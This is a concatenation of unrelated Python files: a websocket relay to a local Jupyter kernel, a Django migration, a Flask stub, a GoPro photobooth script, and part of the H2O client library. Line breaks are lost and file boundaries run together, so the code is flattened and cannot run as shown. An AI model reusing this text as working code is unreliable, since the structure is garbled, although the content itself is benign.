response["content"]["execution_state"] == "idle": if parent_msg_id in neos_cell_msg_ids: del neos_cell_msg_ids[parent_msg_id] except: pass async def loop2(websocket,neossocket,path,session_ids,neos_cell_msg_ids): while 1: session_id = session_ids[0] print("awaiting neos instruction") msg = await neossocket.recv() # print(msg) i = msg.index("/") msg_type = msg[:i] msg_content = msg[i+1:] if msg_type == "updateVar": #update variable await websocket.send(json.dumps(send_comm(msg_content,comm_id,session_id))) elif msg_type == "cell": #execute code j = msg_content.index("/") cellid = msg_content[:j] code = msg_content[j+1:] message = send_execute_request(code,session_id) neos_cell_msg_ids[message["msg_id"]] = cellid message_str = json.dumps(message) # print(message_str) await websocket.send(message_str) elif msg_type == "kernel": if msg_content == "interrupt": await websocket.send(json.dumps(send_kernel_interrupt(session_ids))) # async def loop3(neossocket2,path): # async with websockets.connect("ws://localhost:8888/api/kernels/"+kernel["id"]+"/channels",extra_headers=headers) as websocket: # await websocket.send(json.dumps(send_execute_request(""))) # priming # nonlocal session_id # while 1: # print("awaiting neos kernel instruction") # msg = await neossocket.recv() # print(msg) # i = msg.index("/") # msg_type = msg[:i] # msg_content = msg[i+1:] # if msg_type == "kernel": # if msg_content == "interrupt": # await websocket.send(json.dumps(send_kernel_interrupt(session_id))) async def func(neossocket,path): session_ids=[""] neos_cell_msg_ids = {} # async with websockets.connect("ws://localhost:8888/api/kernels/"+kernel["id"]+"/channels",extra_headers=headers) as websocket: async with websockets.connect("ws://localhost:8888/api/kernels/"+kernel_id+"/channels",extra_headers=headers) as websocket: await websocket.send(json.dumps(send_execute_request(""))) # priming task1 = asyncio.create_task(loop1(websocket,neossocket,path,session_ids,neos_cell_msg_ids)) task2 = asyncio.create_task(loop2(websocket,neossocket,path,session_ids,neos_cell_msg_ids)) # await task1 await task2 return func def set_up_nep_internal(kernel_id,headers): async def func(): session_ids=[""] neos_cell_msg_ids = {} # async with websockets.connect("ws://localhost:8888/api/kernels/"+kernel["id"]+"/channels",extra_headers=headers) as websocket: async with websockets.connect("ws://localhost:8888/api/kernels/"+kernel_id+"/channels",extra_headers=headers) as websocket: await websocket.send(json.dumps(send_execute_request(""))) # priming # await websocket.send(json.dumps(send_execute_request('import os'))) # await websocket.send(json.dumps(send_execute_request('os.write(1, b"text\n")'))) response = await websocket.recv() response = json.loads(response) session_ids[0] = response["header"]["session"] # async for i in range(100): # while 1: # async def loop1(websocket,neossocket,path,session_ids,neos_cell_msg_ids): # code = "\n".join(['from Neptune import Nep','nep = Nep()', 'nep.start()']) await websocket.send(json.dumps(send_execute_request("from neptune import Nep", session_ids[0]))) await websocket.send(json.dumps(send_execute_request("nep=Nep()", session_ids[0]))) await websocket.send(json.dumps(send_execute_request("nep.start()", session_ids[0]))) # code = "10000000000000000+10000000000000000000" # await websocket.send(json.dumps(send_execute_request(code, session_ids[0]))) response = await websocket.recv() print(response) # code = "10000000000000000+10000000000000000000" # await websocket.send(json.dumps(send_execute_request(code, session_ids[0]))) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) response = await websocket.recv() print(response) # task1 = asyncio.create_task(loop1(websocket,neossocket,path,session_ids,neos_cell_msg_ids)) # await task1 # await task2 return func def set_up_nep(kernel_id,auth_token,ws_port): headers = {'Authorization': auth_token} loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) # start_server = websockets.serve(set_up_nep_internal(kernel_id,headers), "localhost", ws_port) loop.run_until_complete(set_up_nep_internal(kernel_id,headers)()) # loop.run_forever() def run_server_from_id(comm_id,kernel_id,auth_token,ws_port): headers = {'Authorization': auth_token} loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) start_server = websockets.serve(main(kernel_id,headers, comm_id), "localhost", ws_port) loop.run_until_complete(start_server) loop.run_forever() def run_server(comm_id, base, notebook_path, auth_token, ws_port): headers = {'Authorization': auth_token} url = base + '/api/kernels' response = requests.get(url,headers=headers) kernels = json.loads(response.text) print(kernels) kernel = kernels[0] # if len(kernels) == 0: # kernel = start_kernel(base,auth_token) # else: # kernel = kernels[0] # loop = asyncio.get_event_loop() loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) start_server = websockets.serve(main(kernel["id"],headers, comm_id), "localhost", ws_port) loop.run_until_complete(start_server) loop.run_forever() def start_kernel(base,auth_token): headers = {'Authorization': auth_token} url = base + '/api/kernels' # response = requests.get(url,headers=headers) # kernels = json.loads(response.text) # print(kernels) data = {"name": "python3"}#, "path": "/"} response = requests.post(url,headers=headers)#, data = data) kernel = json.loads(response.text) print(kernel) return kernel TheDjangoBoys/Gymkhana-Nominationsnomi/migrations/0122_auto_20170805_1217.py # -*- coding: utf-8 -*- # Generated by Django 1.11.2 on 2017-08-05 12:17 from __future__ import unicode_literals from django.db import migrations, models import nomi.models class Migration(migrations.Migration): dependencies = [ ('nomi', '0121_auto_20170805_1213'), ] operations = [ migrations.AlterField( model_name='posthistory', name='end', field=models.DateField(blank=True, default=nomi.models.default_end_date), ), ] from app import create_app import os config_name = os.getenv("FLASK_ENV") app = create_app() if __name__ == '__main__': app.run(debug=True)photobooth.py from datetime import datetime import time, os, subprocess, platform from goprocam import GoProCamera, constants # https://pypi.org/project/goprocam/ import keyboard #https://pypi.org/project/keyboard/ import pyqrcode # https://pypi.org/project/PyQRCode/ import png # https://pypi.org/project/pypng/ import ffmpeg # https://pypi.org/project/ffmpeg-python/ class PhotoBooth(object): def __init__(self, outputPath = "goProVids", videoLength = 3, settings = ("1080p","120"), baseURL = "localhost"): try: os.mkdir(outputPath) print('created output folder' , outputPath) except FileExistsError: print("Directory ", outputPath, " will be used for video output") self.videoLength = videoLength self.settings = settings self.outputPath = outputPath self.baseURL = baseURL # the user-facing website self.lastVideo = None # the last video taken by the booth self.processedVideo = None self.qr = None # now try to connect to the camera. self.gpCam = self.connectCamera() def connectCamera(self): theCamera = None keepTrying = True while (not theCamera and keepTrying): print ("Attempting to connect to the camera.") if (keepTrying): try: theCamera = GoProCamera.GoPro() theCamera.video_settings = self.settings # protune turns on more controls on the camera theCamera.gpControlSet(constants.Video.PROTUNE_VIDEO, constants.Video.ProTune.ON) # sync the time of the camera to the computer theCamera.syncTime() except: print("problem connecting to the camera. Check your network settings") keepTrying = input("Do you want to try again? ").lower() == "y" theCamera = None return theCamera def takeVideo(self): now = datetime.now() videoName = '{:04d}-{:02d}-{:02d}_{:02d}-{:02d}-{:02d}.MP4'.format(now.year, now.month, now.day, now.hour, now.minute, now.second) print("Recording. ") try: self.gpCam.shoot_video(self.videoLength) self.lastVideo = videoName except: self.lastVideo = None def downloadVideo(self): print("downloading shot") self.gpCam.downloadLastMedia(path='', custom_filename=os.path.join(self.outputPath, self.lastVideo)) def processVideo(self): # this appends the QR code to the end of the video, just as a proof of concept. # a more complicated ffmpeg script could overlay a MV watermark, add titles and end screens etc. videoFilePath = os.path.join(self.outputPath, self.lastVideo) processedVideoName = self.lastVideo.rsplit(".", 1)[0]+"_processed.MP4" processedVideoPath = os.path.join(self.outputPath, processedVideoName) qrCodePath = os.path.join(self.outputPath, self.lastVideo + ".png") # I've used this ffmpeg module to wrap the processing script for python, but I think it would be simpler to write # the processing script in "pure" ffmpeg, and call it using the shell try: v1 = (ffmpeg .input(videoFilePath, r=25) ) v2 = (ffmpeg .input(qrCodePath, loop=1, t=2, r=25) .filter("scale", "1920/1080") ) c = ffmpeg.concat(v1, v2).output(processedVideoPath, pix_fmt="yuv420p") c.run() self.processedVideo = processedVideoName except: print("error processing video") self.processedVideo = None def playVideo(self): videoFilePath = None if self.processedVideo: # depending on the platform we can use openCV or a thrird party player like omxplayer on Raspberry Pi videoFilePath = os.path.join(self.outputPath, self.processedVideo) elif self.lastVideo: videoFilePath = os.path.join(self.outputPath, self.lastVideo) if videoFilePath: if platform.system() == 'Darwin': # macOS subprocess.call(('open', videoFilePath)) elif platform.system() == 'Windows': # Windows os.startfile(videoFilePath) else: # linux variants subprocess.call(('xdg-open', videoFilePath)) else: print("No video to play") def makeQR(self): qrText = "http://" + '/'.join((self.baseURL, self.outputPath, self.lastVideo)) self.qr = pyqrcode.create(qrText) def saveQR(self): self.qr.png(os.path.join (self.outputPath, self.lastVideo + ".png"), scale =6) def showQR(self): self.makeQR() self.qr.show() def countDown(self): # do fancy countdown shenannigans here, or… for i in range(3, 0, -1): print(i) time.sleep(1) def newPhotoBoothSession(self): if (self.gpCam): print ("press spacebar to start") keyboard.wait(" ") # wait for spacebar - use GPIO etc self.countDown() self.takeVideo() self.downloadVideo() self.processVideo() self.playVideo() self.showQR()""" This module provides all of the top level calls for models and various data transform methods. By simply """ import os import os.path import re import urllib import urllib2 import json import imp import random import tabulate from connection import H2OConnection from job import H2OJob from expr import ExprNode from frame import H2OFrame, _py_tmp_key from model import H2OBinomialModel,H2OAutoEncoderModel,H2OClusteringModel,H2OMultinomialModel,H2ORegressionModel import h2o_model_builder def import_file(path): """ Import a single file or collection of files. :param path: A path to a data file (remote or local). :return: A new H2OFrame """ paths = [path] if isinstance(path,str) else path return [ _import1(fname) for fname in paths ] def _import1(path): j = H2OConnection.get_json(url_suffix="ImportFiles", path=path) if j['fails']: raise ValueError("ImportFiles of " + path + " failed on " + j['fails']) return j['destination_frames'][0] def upload_file(path, destination_frame=""): """ Upload a dataset at the path given from the local machine to the H2O cluster. :param path: A path specifying the location of the data to upload. :param destination_frame: The name of the H2O Frame in the H2O Cluster. :return: A new H2OFrame """ fui = {"file": os.path.abspath(path)} destination_frame = _py_tmp_key() if destination_frame == "" else destination_frame H2OConnection.post_json(url_suffix="PostFile", file_upload_info=fui,destination_frame=destination_frame) return H2OFrame(raw_id=destination_frame) def import_frame(path=None): """ Import a frame from a file (remote or local machine). If you run H2O on Hadoop, you can access to HDFS :param path: A path specifying the location of the data to import. :return: A new H2OFrame """ return H2OFrame(file_path=path) def parse_setup(raw_frames): """ :param raw_frames: A collection of imported file frames :return: A ParseSetup "object" """ # The H2O backend only accepts things that are quoted if isinstance(raw_frames, unicode): raw_frames = [raw_frames] j = H2OConnection.post_json(url_suffix="ParseSetup", source_frames=[_quoted(id) for id in raw_frames]) return j def parse(setup, h2o_name, first_line_is_header=(-1, 0, 1)): """ Trigger a parse; blocking; removeFrame just keep the Vecs. :param setup: The result of calling parse_setup. :param h2o_name: The name of the H2O Frame on the back end. :param first_line_is_header: -1 means data, 0 means guess, 1 means header. :return: A new parsed object """ # Parse parameters (None values provided by setup) p = { 'destination_frame' : h2o_name, 'parse_type' : None, 'separator' : None, 'single_quotes' : None, 'check_header' : None, 'number_columns' : None, 'chunk_size' : None, 'delete_on_done' : True, 'blocking' : False, } if isinstance(first_line_is_header, tuple): first_line_is_header = setup["check_header"] if setup["column_names"]: setup["column_names"] = [_quoted(name) for name in setup["column_names"]] p["column_names"] = None if setup["column_types"]: setup["column_types"] = [_quoted(name) for name in setup["column_types"]] p["column_types"] = None if setup["na_strings"]: setup["na_strings"] = [[_quoted(na) for na in col] if col is not None else [] for col in setup["na_strings"]] p["na_strings"] = None # update the parse parameters with the parse_setup values p.update({k: v for k, v in setup.iteritems() if k in p}) p["check_header"] = first_line_is_header # Extract only 'name' from each src in the array of srcs p['source_frames'] = [_quoted(src['name']) for src in setup['source_frames']] # Request blocking parse j = H2OJob(H2OConnection.post_json(url_suffix="Parse", **p), "Parse").poll() return j.jobs def parse_raw(setup, id=None, first_line_is_header=(-1,0,1)): """ Used in conjunction with import_file and parse_setup in order to make alterations before parsing. :param setup: Result of h2o.parse_setup :param id: An optional id for the frame. :param first_line_is_header: -1,0,1 if the first line is to be used as the header :return: An H2OFrame object """ id = setup["destination_frame"] fr = H2OFrame() parsed = parse(setup, id, first_line_is_header) fr._nrows = parsed['rows'] fr._col_names = parsed['column_names'] fr._ncols = len(fr._col_names) fr._computed = True fr._id = id return fr def _quoted(key): if key == None: return "\"\"" is_quoted = len(re.findall(r'\"(.+?)\"', key)) != 0 key = key if is_quoted else "\"" + key + "\"" return key def assign(data,id): rapids(ExprNode(",", ExprNode("gput", id, data), ExprNode("removeframe", data))._eager()) data._id = id return data def which(condition): """ :param condition: A conditional statement. :return: A H2OFrame of 1 column filled with 0-based indices for which the condition is True """ return H2OFrame(expr=ExprNode("h2o.which",condition,False))._frame() def ifelse(test,yes,no): """ Semantically equivalent to R's ifelse. Based on the booleans in the test vector, the output has the values of the yes and no vectors interleaved (or merged together). :param test: A "test" H2OFrame :param yes: A "yes" H2OFrame :param no: A "no" H2OFrame :return: An H2OFrame """ return H2OFrame(expr=ExprNode("ifelse",test,yes,no))._frame() def get_future_model(future_model): """ Waits for the future model to finish building, and then returns the model. :param future_model: an H2OModelFuture object :return: a resolved model (i.e. an H2OBinomialModel, H2ORegressionModel, H2OMultinomialModel, ...) """ return h2o_model_builder._resolve_model(future_model) def get_model(model_id): """ Return the specified model :param model_id: The model identification in h2o """ model_json = H2OConnection.get_json("Models/"+model_id)["models"][0] model_type = model_json["output"]["model_category"] if model_type=="Binomial": return H2OBinomialModel(model_id, model_json) elif model_type=="Clustering": return H2OClusteringModel(model_id, model_json) elif model_type=="Regression": return H2ORegressionModel(model_id, model_json) elif model_type=="Multinomial": return H2OMultinomialModel(model_id, model_json) elif model_type=="AutoEncoder": return H2OAutoEncoderModel(model_id, model_json) else: raise NotImplementedError(model_type) def get_frame(frame_id): """ Obtain a handle to the frame in H2O with the frame_id key. :return: An H2OFrame """ return H2OFrame.get_frame(frame_id) """ Here are some testing utilities for running the pyunit tests in conjunction with run.py. run.py issues an ip and port as a string: ":". The expected value of sys_args[1] is ":" """ """ All tests MUST have the following structure: import sys sys.path.insert(1, "..") # may vary depending on this test's position relative to h2o-py import h2o def my_test(ip=None, port=None): ...test filling... if __name__ == "__main__": h2o.run_test(sys.argv, my_test) So each test must have an ip and port """ # TODO/FIXME: need to create an internal testing framework for python ... internal IP addresses should NOT be published as part of package! # HDFS helpers def get_h2o_internal_hdfs_name_node(): return "172.16.2.176" def is_running_internal_to_h2o(): url = "http://{0}:50070".format(get_h2o_internal_hdfs_name_node()) try: urllib2.urlopen(urllib2.Request(url)) internal = True except: internal = False return internal def check_models(model1, model2, use_cross_validation=False, op='e'): """ Check that the given models are equivalent :param model1: :param model2: :param use_cross_validation: boolean. if True, use validation metrics to determine model equality. Otherwise, use training metrics. :param op: comparison operator to use. 'e':==, 'g':>, 'ge':>= :return: None. Throw meaningful error messages if the check fails """ # 1. Check model types model1_type = type(model1) model2_type = type(model2) assert model1_type == model2_type, "The model types differ. The first model is of type {0} and the second " \ "models is of type {1}.".format(model1_type, model2_type) # 2. Check model metrics if isinstance(model1,H2OBinomialModel): # 2a. Binomial # F1 f1_1 = model1.F1(xval=use_cross_validation) f1_2 = model2.F1(xval=use_cross_validation) if op == 'e': assert f1_1[0][1] == f1_2[0][1], "The first model has an F1 of {0} and the second model has an F1 of " \ "{1}. Expected the first to be == to the second.".format(f1_1[0][1], f1_2[0][1]) elif op == 'g': assert f1_1[0][1] > f1_2[0][1], "The first model has an F1 of {0} and the second model has an F1 of " \ "{1}. Expected the first to be > than the second.".format(f1_1[0][1], f1_2[0][1]) elif op == 'ge': assert f1_1[0][1] >= f1_2[0][1], "The first model has an F1 of {0} and the second model has an F1 of " \ "{1}. Expected the first to be >= than the second.".format(f1_1[0][1], f1_2[0][1]) elif isinstance(model1,H2ORegressionModel): # 2b. Regression # MSE mse1 = model1.mse(xval=use_cross_validation) mse2 = model2.mse(xval=use_cross_validation) if op == 'e': assert mse1 == mse2, "The first model has an MSE of {0} and the second model has an MSE of " \ "{1}. Expected the first to be == to the second.".format(mse1, mse2) elif op == 'g': assert mse1 > mse2, "The first model has an MSE of {0} and the second model has an MSE of " \ "{1}. Expected the first to be > than the second.".format(mse1, mse2) elif op == 'ge': assert mse1 >= mse2, "The first model has an MSE of {0} and the second model has an MSE of " \ "{1}. Expected the first to be >= than the second.".format(mse1, mse2) elif isinstance(model1,H2OMultinomialModel): # 2c. Multinomial # hit-ratio pass elif isinstance(model1,H2OClusteringModel): # 2d. Clustering # totss totss1 = model1.totss(xval=use_cross_validation) totss2 = model2.totss(xval=use_cross_validation) if op == 'e': assert totss1 == totss2, "The first model has an TOTSS of {0} and the second model has an " \ "TOTSS of {1}. Expected the first to be == to the second.".format(totss1, totss2) elif op == 'g': assert totss1 > totss2, "The first model has an TOTSS of {0} and the second model has an " \ "TOTSS of {1}. Expected the first to be > than the second.".format(totss1, totss2) elif op == 'ge': assert totss1 >= totss2, "The first model has an TOTSS of {0} and the second model has an " \ "TOTSS of {1}. Expected the first to be >= than the second." \ "".format(totss1, totss2) def check_dims_values(python_obj, h2o_frame, rows, cols): """ Check that the dimensions and values of the python object and H2OFrame are equivalent. Assumes that the python object conforms to the rules specified in the h2o frame documentation. :param python_obj: a (nested) list, tuple, dictionary, numpy.ndarray, ,or pandas.DataFrame :param h2o_frame: an H2OFrame :param rows: number of rows :param cols: number of columns :return: None """ h2o_rows, h2o_cols = h2o_frame.dim() assert h2o_rows == rows and h2o_cols == cols, "failed dim check! h2o_rows:{0} rows:{1} h2o_cols:{2} cols:{3}" \ "".format(h2o_rows, rows, h2o_cols, cols) if isinstance(python_obj, (list, tuple)): for r in range(rows): for c in range(cols): pval = python_obj[r][c] if rows > 1 else python_obj[c] hval = h2o_frame[r,c] assert pval == hval, "expected H2OFrame to have the same values as the python object for row {0} and column " \ "{1}, but h2o got {2} and python got {3}.".format(r, c, hval, pval) elif isinstance(python_obj, dict): for r in range(rows): for k in python_obj.keys(): pval = python_obj[k][r] if hasattr(python_obj[k],'__iter__') else python_obj[k] hval = h2o_frame[r,k] assert pval == hval, "expected H2OFrame to have the same values as the python object for row {0} and column " \ "{1}, but h2o got {2} and python got {3}.".format(r, k, hval, pval) def np_comparison_check(h2o_data, np_data, num_elements): """ Check values achieved by h2o against values achieved by numpy :param h2o_data: an H2OFrame or H2OVec :param np_data: a numpy array :param num_elements: number of elements to compare :return: None """ # Check for numpy try: imp.find_module('numpy') except ImportError: assert False, "failed comparison check because unable to import numpy" import numpy as np rows, cols = h2o_data.dim() for i in range(num_elements): r = random.randint(0,rows-1) c = random.randint(0,cols-1) h2o_val = h2o_data[r,c] if isinstance(h2o_data,H2OFrame) else h2o_data[r] np_val = np_data[r,c] if len(np_data.shape) > 1 else np_data[r] if isinstance(np_val, np.bool_): np_val = bool(np_val) # numpy haz special bool type :( assert np.absolute(h2o_val - np_val) < 1e-6, \ "failed comparison check! h2o computed {0} and numpy computed {1}".format(h2o_val, np_val) def run_test(sys_args, test_to_run): # import pkg_resources # ver = pkg_resources.get_distribution("h2o").version # print "H2O PYTHON PACKAGE VERSION: " + str(ver) ip, port = sys_args[2].split(":") init(ip,port) log_and_echo("------------------------------------------------------------") log_and_echo("") log_and_echo("STARTING TEST: "+str(ou())) log_and_echo("") log_and_echo("------------------------------------------------------------") num_keys = store_size() test_to_run(ip, port) if keys_leaked(num_keys): print "Leaked Keys!" def ou(): """ Where is my baguette!? :return: the name of the baguette. oh uhr uhr huhr """ from inspect import stack return stack()[2][1] def log_and_echo(message): """ Log a message on the server-side logs This is helpful when running several pieces of work one after the other on a single H2O cluster and you want to make a notation in the H2O server side log where one piece of work ends and the next piece of work begins. Sends a message to H2O for logging. Generally used for debugging purposes. :param message: A character string with the message to write to the log. :return: None """ if message is None: message = "" H2OConnection.post_json("LogAndEcho", message=message) def ipy_notebook_exec(path,save_and_norun=False): notebook = json.load(open(path)) program = '' for block in ipy_blocks(notebook): for line in ipy_lines(block): if "h2o.init" not in line: program += line if '\n' in line else line + '\n' if save_and_norun: with open(os.path.basename(path).split('ipynb')[0]+'py',"w") as f: f.write(program) else: d={} exec program in d # safe, but horrible (exec is horrible) def ipy_blocks(notebook): if 'worksheets' in notebook.keys(): return notebook['worksheets'][0]['cells'] # just take the first worksheet elif 'cells' in notebook.keys(): return notebook['cells'] else: raise NotImplementedError, "ipython notebook cell/block json format not handled" def ipy_lines(block): if 'source' in block.keys(): return block['source'] elif 'input' in block.keys(): return block['input'] else: raise NotImplementedError, "ipython notebook source/line json format not handled" def remove(object): """ Remove object from H2O. This is a "hard" delete of the object. It removes all subparts. :param object: The object pointing to the object to be removed. :return: None """ if object is None: raise ValueError("remove with no object is not supported, for your protection") if isinstance(object, H2OFrame): H2OConnection.delete("DKV/"+object._id) if isinstance(object, str): H2OConnection.delete("DKV/"+object) def remove_all(): """ Remove all objects from H2O. :return None """ H2OConnection.delete("DKV") def removeFrameShallow(key): """ Do a shallow DKV remove of the frame (does not remove any internal Vecs). This is a "soft" delete. Just removes the top level pointer, but all big data remains! :param key: A Frame Key to be removed :return: None """ rapids("(removeframe '"+key+"')") return None def rapids(expr, id=None): """ Fire off a Rapids expression. :param expr: The rapids expression (ascii string). :return: The JSON response of the Rapids execution """ if isinstance(expr, list): expr = ExprNode._collapse_sb(expr) expr = "(= !{} {})".format(id,expr) if id is not None else expr result = H2OConnection.post_json("Rapids", ast=urllib.quote(expr), _rest_version=99) if result['error'] is not None: raise EnvironmentError("rapids expression not evaluated: {0}".format(str(result['error']))) return result def ls(): """ List Keys on an H2O Cluster :return: Returns a list of keys in the current H2O instance """ return H2OFrame(expr=ExprNode("ls"))._frame().as_data_frame() def frame(frame_id, exclude=""): """ Retrieve metadata for a id that points to a Frame. :param frame_id: A pointer to a Frame in H2O. :return: Meta information on the frame """ return H2OConnection.get_json("Frames/" + urllib.quote(frame_id+exclude)) def frames(): """ Retrieve all the Frames. :return: Meta information on the frames """ return H2OConnection.get_json("Frames") def download_pojo(model,path=""): """ Download the POJO for this model to the directory specified by path (no trailing slash!). If path is "", then dump to screen. :param model: Retrieve this model's scoring POJO. :param path: An absolute path to the directory where POJO should be saved. :return: None """ java = H2OConnection.get( "Models.java/"+model._id ) file_path = path + "/" + model._id + ".java" if path == "": print java.text else: with open(file_path, 'w') as f: f.write(java.text) def download_csv(data, filename): """ Download an H2O data set to a CSV file on the local disk. Warning: Files located on the H2O server may be very large! Make sure you have enough hard drive space to accommodate the entire file. :param data: an H2OFrame object to be downloaded. :param filename:A string indicating the name that the CSV file should be should be saved to. :return: None """ if not isinstance(data, H2OFrame): raise(ValueError, "`data` argument must be an H2OFrame, but got " + type(data)) url = "http://{}:{}/3/DownloadDataset?frame_id={}".format(H2OConnection.ip(),H2OConnection.port(),data._id) with open(filename, 'w') as f: response = urllib2.urlopen(url) f.write(response.read()) f.close() def download_all_logs(dirname=".",filename=None): """ Download H2O Log Files to Disk :param dirname: (Optional) A character string indicating the directory that the log file should be saved in. :param filename: (Optional) A string indicating the name that the CSV file should be :return: path of logs written (as a string) """ url = 'http://' + H2OConnection.ip() + ':' + str(H2OConnection.port()) + '/Logs/download' response = urllib2.urlopen(url) if not os.path.exists(dirname): os.mkdir(dirname) if filename == None: for h in response.headers.headers: if 'filename=' in h: filename = h.split("filename=")[1].strip() break path = os.path.join(dirname,filename) with open(path, 'w') as f: response = urllib2.urlopen(url) f.write(response.read()) f.close() print "Writing H2O logs to " + path return path def save_model(model, dir="", name="", filename="", force=False): """ Save an H2O Model Object to Disk. In the case of existing files force = TRUE will overwrite the file. Otherwise, the operation will fail. :param dir: string indicating the directory the model will be written to. :param name: string name of the file. :param filename: full path to the file. :param force: logical, indicates how to deal with files that already exist :return: the path of the model (string) """ if not isinstance(dir, str): raise ValueError("`dir` must be a character string") if dir == "": dir = os.getcwd() if not isinstance(name, str): raise ValueError("`name` must be a character string") if name == "": name = model._model_json['model_id']['name'] if not isinstance(filename, str): raise ValueError("`filename` must be a character string") if not isinstance(force, bool): raise ValueError("`force` must be True or False") path = filename if filename != "" else os.path.join(dir, name) kwargs = dict([("dir",path), ("force",int(force)), ("_rest_version", 99)]) H2OConnection.get("Models.bin/"+model._model_json['model_id']['name'], **kwargs) return path def load_model(path): """ Load a saved H2O model from disk. :param path: The full path of the H2O Model to be imported. For example, if the `dir` argument in h2o.saveModel was set to "/Users/UserName/Desktop" then the `path` argument in h2o.loadModel should be set to something like "/Users/UserName/Desktop/K-meansModel__a7cebf318ca5827185e209edf47c4052" :return: the model """ if not isinstance(path, str): raise ValueError("`path` must be a non-empty character string") kwargs = dict([("dir",path), ("_rest_version", 99)]) res = H2OConnection.post("Models.bin/", **kwargs) return get_model(res.json()['models'][0]['model_id']['name']) def cluster_status(): """ TODO: This isn't really a cluster status... it's a node status check for the node we're connected to. This is possibly confusing because this can come back without warning, but if a user tries to do any remoteSend, they will get a "cloud sick warning" Retrieve information on the status of the cluster running H2O. :return: None """ cluster_json = H2OConnection.get_json("Cloud?skip_ticks=true") print "Version: {0}".format(cluster_json['version']) print "Cloud name: {0}".format(cluster_json['cloud_name']) print "Cloud size: {0}".format(cluster_json['cloud_size']) if cluster_json['locked']: print "Cloud is locked\n" else: print "Accepting new members\n" if cluster_json['nodes'] == None or len(cluster_json['nodes']) == 0: print "No nodes found" return status = [] for node in cluster_json['nodes']: for k, v in zip(node.keys(),node.values()): if k in ["h2o", "healthy", "last_ping", "num_cpus", "sys_load", "mem_value_size", "total_value_size", "free_mem", "tot_mem", "max_mem", "free_disk", "max_disk", "pid", "num_keys", "tcps_active", "open_fds", "rpcs_active"]: status.append(k+": {0}".format(v)) print ', '.join(status) print def init(ip="localhost", port=54321, size=1, start_h2o=False, enable_assertions=False, license=None, max_mem_size_GB=None, min_mem_size_GB=None, ice_root=None, strict_version_check=False): """ Initiate an H2O connection to the specified ip and port. :param ip: An IP address, default is "localhost" :param port: A port, default is 54321 :param size: THe expected number of h2o instances (ignored if start_h2o is True) :param start_h2o: A boolean dictating whether this module should start the H2O jvm. An attempt is made anyways if _connect fails. :param enable_assertions: If start_h2o, pass `-ea` as a VM option.s :param license: If not None, is a path to a license file. :param max_mem_size_GB: Maximum heap size (jvm option Xmx) in gigabytes. :param min_mem_size_GB: Minimum heap size (jvm option Xms) in gigabytes. :param ice_root: A temporary directory (default location is determined by tempfile.mkdtemp()) to hold H2O log files. :return: None """ H2OConnection(ip=ip, port=port,start_h2o=start_h2o,enable_assertions=enable_assertions,license=license,max_mem_size_GB=max_mem_size_GB,min_mem_size_GB=min_mem_size_GB,ice_root=ice_root,strict_version_check=strict_version_check) return None def export_file(frame,path,force=False): """ Export a given H2OFrame to a path on the machine this python session is currently connected to. To view the current session, call h2o.cluster_info(). :param frame: The Frame to save to disk. :param path: The path to the save point on disk. :param force: Overwrite any preexisting file with the same path :return: None """ H2OJob(H2OConnection.post_json("Frames/"+frame._id+"/export/"+path+"/overwrite/"+("true" if force else "false")), "Export File").poll() def cluster_info(): """ Display the current H2O cluster information. :return: None """ H2OConnection._cluster_info() def shutdown(conn=None, prompt=True): """ Shut down the specified instance. All data will be lost. This method checks if H2O is running at the specified IP address and port, and if it is, shuts down that H2O instance. :param conn: An H2OConnection object containing the IP address and port of the server running H2O. :param prompt: A logical value indicating whether to prompt the user before shutting down the H2O server. :return: None """ if conn == None: conn = H2OConnection.current_connection() H2OConnection._shutdown(conn=conn, prompt=prompt) def deeplearning(x,y=None,validation_x=None,validation_y=None,**kwargs): """ Build a supervised Deep Learning model (kwargs are the same arguments that you can find in FLOW) :return: Return a new classifier or regression model. """ return h2o_model_builder.supervised_model_build(x,y,validation_x,validation_y,"deeplearning",kwargs) def autoencoder(x,**kwargs): """ Build an Autoencoder :param x: Columns with which to build an autoencoder :param kwargs: Additional arguments to pass to the autoencoder. :return: A new autoencoder model """ return h2o_model_builder.unsupervised_model_build(x,None,"autoencoder",kwargs) def gbm(x,y,validation_x=None,validation_y=None,**kwargs): """ Build a Gradient Boosted Method model (kwargs are the same arguments that you can find in FLOW) :return: A new classifier or regression model. """ return h2o_model_builder.supervised_model_build(x,y,validation_x,validation_y,"gbm",kwargs) def glm(x,y,validation_x=None,validation_y=None,**kwargs): """ Build a Generalized Linear Model (kwargs are the same arguments that you can find in FLOW) :return: A new regression or binomial classifier. """ kwargs = dict([(k, kwargs[k]) if k != "Lambda" else ("lambda", kwargs[k]) for k in kwargs]) return h2o_model_builder.supervised_model_build(x,y,validation_x,validation_y,"glm",kwargs) def start_glm_job(x,y,validation_x=None,validation_y=None,**kwargs): """ Build a Generalized Linear Model (kwargs are the same arguments that you can find in FLOW). Note: this function is the same as glm(), but it doesn't block on model-build. Instead, it returns and H2OModelFuture object immediately. The model can be retrieved from the H2OModelFuture object with get_future_model(). :return: H2OModelFuture """ kwargs["do_future"] = True return glm(x,y,validation_x,validation_y,**kwargs) def kmeans(x,validation_x=None,**kwargs): """ Build a KMeans model (kwargs are the same arguments that you can find in FLOW) :return: A new clustering model """ return h2o_model_builder.unsupervised_model_build(x,validation_x,"kmeans",kwargs) def random_forest(x,y,validation_x=None,validation_y=None,**kwargs): """ Build a Random Forest Model (kwargs are the same arguments that you can find in FLOW) :return: A new classifier or regression model. """ return h2o_model_builder.supervised_model_build(x,y,validation_x,validation_y,"drf",kwargs) def prcomp(x,validation_x=None,**kwargs): """ Principal components analysis of a H2O dataset using the power method to calculate the singular value decomposition of the Gram matrix. :param k: The number of principal components to be computed. This must be between 1 and min(ncol(training_frame), nrow(training_frame)) inclusive. :param model_id: (Optional) The unique hex key assigned to the resulting model. Automatically generated if none is provided. :param max_iterations: The maximum number of iterations to run each power iteration loop. Must be between 1 and 1e6 inclusive. :param transform: A character string that indicates how the training data should be transformed before running PCA. Possible values are "NONE": for no transformation, "DEMEAN": for subtracting the mean of each column, "DESCALE": for dividing by the standard deviation of each column, "STANDARDIZE": for demeaning and descaling, and "NORMALIZE": for demeaning and dividing each column by its range (max - min). :param seed: (Optional) Random seed used to initialize the right singular vectors at the beginning of each power method iteration. :param use_all_factor_levels: (Optional) A logical value indicating whether all factor levels should be included in each categorical 